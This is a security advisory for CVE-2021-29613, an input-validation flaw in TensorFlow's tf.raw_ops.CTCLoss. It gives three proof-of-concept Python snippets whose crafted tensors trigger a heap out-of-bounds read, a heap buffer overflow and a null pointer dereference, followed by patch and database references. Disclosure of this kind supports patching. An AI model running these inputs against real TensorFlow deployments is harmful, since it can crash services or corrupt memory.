CVE-2021-29613: Incomplete validation in `tf.raw_ops.CTCLoss`
(updated )
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap:
import tensorflow as tf
inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=True, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=True)
An attacker can also trigger a heap buffer overflow:
import tensorflow as tf
inputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32)
labels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64)
labels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=False, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=False)
Finally, an attacker can trigger a null pointer dereference:
import tensorflow as tf
inputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32)
labels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64)
labels_values = tf.constant([], shape=[0], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
labels_values=labels_values, sequence_length=sequence_length,
preprocess_collapse_repeated=False, ctc_merge_repeated=False,
ignore_longer_outputs_than_inputs=False)
References
- github.com/advisories/GHSA-vvg4-vgrv-xfr7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-541.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-739.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-250.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c
- github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vvg4-vgrv-xfr7
- nvd.nist.gov/vuln/detail/CVE-2021-29613
Code Behaviors & Features
Detect and mitigate CVE-2021-29613 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →